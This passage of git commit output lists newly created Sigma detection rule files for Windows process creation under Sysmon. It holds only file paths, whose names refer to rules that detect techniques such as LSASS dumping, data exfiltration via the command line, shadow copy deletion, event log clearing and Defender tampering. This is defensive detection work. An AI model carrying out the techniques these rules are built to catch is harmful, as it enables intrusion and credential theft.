tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_defender_exclusion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_delete_safeboot.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_delete_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_desktop_background_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_disable_sec_services.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_machineguid.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_modify_group_policy_settings.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_nolmhash.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_open_command.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_query_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_screensaver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_service_imagepath_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_software_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_volsnap_disable.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_windows_defender_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regedit_export_critical_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regedit_export_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regedit_import_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regedit_import_keys_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regedit_trustedinstaller.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regini_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regini_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_logon_script.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_new_network_provider.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_privilege_escalation_via_service_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_set_unsecure_powershell_policy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_registry_typed_paths_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_http_ip_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_network_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_remote_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_susp_exec_path_2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_anydesk_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_logmein.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_rurat_non_default_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_remote_time_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_adfind.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_autohotkey.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_autoit.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_binary.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_browsercore.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_cloudflared.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_createdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_curl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_dctask64.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_ftp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_gpg4win.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_jusched.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_mavinject.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_megasync.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_msdt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_netsupport_rat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_office_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_paexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_pingcastle.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_plink.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_pressanykey.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_rurat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_vmnat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_renamed_whoami.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rpcping_credential_capture.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ruby_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_by_ordinal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_inline_vbs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_installscreensaver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_keymgr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_no_params.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_ntlmrelay.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_parent_explorer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_registered_com_objects.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_run_locations.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_script_run.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_shell32_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_spawn_explorer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_susp_activity.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_susp_shimcache_flush.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_sys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_unc_path.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_uncommon_dll_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_user32_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_rundll32_without_parameters.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_runonce_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_create_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_disable_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_new_kernel_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_sdset_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_service_path_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sc_stop_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_appdata_local_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_delete.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_delete_all.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_disable.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_env_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_folder_combos.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_guid_task_name.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_one_time_only_midnight_task.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_persistence_windows_telemetry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_powershell_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_reg_loader.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_schedule_type.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_schedule_type_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_susp_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_schtasks_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_scrcons_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sdbinst_shim_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sdbinst_susp_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sdclt_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sdiagnhost_susp_child.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_secedit_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_servu_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_setspn_spn_enumeration.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_shutdown_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_shutdown_logoff.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sndvol_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_soundrecorder_audio_capture.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_splwow64_cli_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_spoolsv_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sqlite_firefox_gecko_profile_data.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_squirrel_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_squirrel_proxy_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ssh_port_forward.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ssh_rdp_tunneling.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ssm_agent_abuse.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_stordiag_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_16bit_application.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_abusing_debug_privilege.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_add_user_local_admin_group.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_add_user_remote_desktop_group.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_alternate_data_streams.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_appx_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_archiver_iso_phishing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_automated_collection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_bad_opsec_sacrificial_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_child_process_as_system_.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_escape_char.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_cli_obfuscation_unicode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_commandline_path_traversal_evasion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_copy_browser_data.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_copy_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_copy_system_dir.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_crypto_mining_monero.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_disable_raccine.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_double_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_double_extension_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_download_office_domain.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_dumpstack_log_evasion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_electron_app_children.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_embed_exe_lnk.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_etw_modification_cmdline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_etw_trace_evasion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_eventlog_clear.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_eventlog_content_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_execution_from_guid_folder_names.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_execution_path.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_execution_path_webserver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_file_characteristics.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_gather_network_info_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_hidden_dir_index_allocation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_hiding_malware_in_fonts_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_image_missing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_inline_win_api_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_network_command.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_network_scan_loop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_network_sniffing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_non_exe_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ntds.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_nteventlogfile_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_ntfs_short_name_use_image.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_obfuscated_ip_via_cli.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_office_token_search.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_parents.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_private_keys_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_privilege_escalation_cli_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_proc_wrong_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_progname.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_redirect_local_admin_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_remote_desktop_tunneling.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_right_to_left_override.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_script_exec_from_temp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_service_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_service_dir.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_service_tamper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_shadow_copies_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_sysnative.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_system_exe_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_system_user_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_sysvol_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_task_folder_evasion.yml create mode 100644 